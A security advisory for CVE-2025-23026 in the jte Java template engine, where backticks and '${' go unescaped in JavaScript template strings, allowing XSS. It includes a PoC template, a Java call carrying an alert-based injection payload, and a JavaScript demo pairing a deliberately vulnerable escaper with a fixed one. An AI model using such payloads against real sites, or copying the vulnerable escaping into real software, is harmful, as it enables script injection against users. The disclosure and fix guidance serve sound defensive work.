
CVE-2025-23026 gg.jte:jte-runtime

Package

Manager: maven
Name: gg.jte:jte-runtime
Vulnerable Version: >=0 <3.1.16

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

EPSS: 0.00051 (percentile 0.15708)

Details

jte's HTML templates containing JavaScript template strings are subject to XSS

### Summary

jte HTML templates with `script` tags or script attributes that include a JavaScript template string (backtick-delimited) are subject to XSS.

### Details

The `javaScriptBlock` and `javaScriptAttribute` methods in the `Escape` class ([source](https://github.com/casid/jte/blob/main/jte-runtime/src/main/java/gg/jte/html/escape/Escape.java#L43-L83)) do not escape backticks, which delimit JavaScript [template strings](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#description). An attacker-controlled value placed inside such a string can therefore close the literal and inject arbitrary JavaScript. Dollar signs should be escaped as well, since an unescaped `${` inside a template string is evaluated as an interpolation expression.

### PoC

1. Use the [jte Gradle Plugin](https://jte.gg/gradle-plugin/) with the following template in `src/jte/xss.jte`:

```html
@param String someMessage
<!DOCTYPE html>
<html lang="en">
<head>
  <title>XSS Test</title>
  <script>window.someVariable = `${someMessage}`;</script>
</head>
<body>
  <h1>XSS Test</h1>
</body>
</html>
```

2. Render it with the following Java code. `JtexssGenerated` is the class the plugin generates from `xss.jte`; `renderHtml` is a helper (not shown in the advisory) that hands the rendered page to a browser:

```java
import gg.jte.html.OwaspHtmlTemplateOutput;
import gg.jte.output.StringOutput;

final StringOutput output = new StringOutput();
// The third argument is the untrusted value for @param someMessage. Because backticks
// are not escaped, it closes the template string, calls alert(), and reopens the string.
JtexssGenerated.render(new OwaspHtmlTemplateOutput(output), null, "` + alert(`xss`) + `");
renderHtml(output);
```

### Impact

HTML templates rendered through jte's `OwaspHtmlTemplateOutput` in versions up to and including `3.1.15` that contain `script` tags or script attributes with JavaScript template strings (backticks) are vulnerable; the vulnerable range above ends at `3.1.16`.
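A worked illustration of the escaping gap described in Details and PoC above, added here as an example and not part of the advisory or of jte's code base. It models a simplified pre-3.1.16 `javaScriptBlock` escaper (an assumption about which characters it neutralises, not a copy of `Escape.java`), places a backtick-aware escaper beside it, renders the advisory's `<script>` line with each, and executes the result against a stubbed `window`/`alert` so the difference is observable outside a browser. The payloads are constructed inputs; the first is the advisory's PoC value.

```javascript
// Added example, not jte's code: models the escaping gap behind CVE-2025-23026.

// Simplified stand-in for jte's pre-3.1.16 javaScriptBlock escaping (assumption:
// it neutralises backslashes, quotes, newlines and angle brackets, but neither the
// backtick delimiter nor the "${" interpolation opener, which is the gap the
// advisory reports against gg.jte.html.escape.Escape).
function escapeJsBlockVulnerable(value) {
  return value
    .replace(/\\/g, "\\\\")
    .replace(/"/g, '\\"')
    .replace(/'/g, "\\'")
    .replace(/\n/g, "\\n")
    .replace(/\r/g, "\\r")
    .replace(/</g, "\\u003C")
    .replace(/>/g, "\\u003E");
}

// Hardened variant: backslashes are already doubled above, so escaping "`" and
// "${" afterwards cannot be undone by a later substitution.
function escapeJsBlockFixed(value) {
  return escapeJsBlockVulnerable(value)
    .replace(/`/g, "\\`")
    .replace(/\$\{/g, "\\${");
}

// The <script> line from the advisory's xss.jte, with @param someMessage inserted
// through the chosen escaper.
function renderScript(escape, someMessage) {
  return "window.someVariable = `" + escape(someMessage) + "`;";
}

// Stand-in for the browser: runs the generated script with a plain object as
// `window` and an `alert` that records its argument instead of opening a dialog.
function executeScript(script) {
  const alertCalls = [];
  const fakeWindow = {};
  const fakeAlert = (msg) => { alertCalls.push(String(msg)); };
  new Function("window", "alert", script)(fakeWindow, fakeAlert);
  return { someVariable: fakeWindow.someVariable, alertCalls };
}

// Render, then execute, with a given escaper; returns what the page would observe.
function runTemplate(escape, someMessage) {
  return executeScript(renderScript(escape, someMessage));
}

// Constructed inputs: the advisory's PoC payload, and one that only exercises "${".
const BACKTICK_PAYLOAD = "` + alert(`xss`) + `";
const INTERPOLATION_PAYLOAD = "${1+1}";

for (const [name, escape] of [["vulnerable", escapeJsBlockVulnerable], ["fixed", escapeJsBlockFixed]]) {
  console.log(name, "backtick payload:", runTemplate(escape, BACKTICK_PAYLOAD));
  console.log(name, "interpolation payload:", runTemplate(escape, INTERPOLATION_PAYLOAD));
}
```

Run with `node`. With the vulnerable escaper the PoC payload breaks out of the backtick string and `alert` fires; with the hardened escaper the page receives the payload as an inert string. The second payload contains no backtick at all, yet the vulnerable escaper lets `${1+1}` evaluate to `2`, which is why the advisory asks for `$` handling on top of backtick escaping. Until a project is on jte 3.1.16 or later, any value that reaches a backtick string through `javaScriptBlock` or `javaScriptAttribute` should be treated as unescaped.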

Metadata

Created: 2025-01-13T16:57:59Z
Modified: 2025-01-13T21:49:25Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-vh22-6c6h-rm8q/GHSA-vh22-6c6h-rm8q.json
CWE IDs: ["CWE-150", "CWE-79"]
Alternative ID: GHSA-vh22-6c6h-rm8q
Finding: F008
Auto approve: 1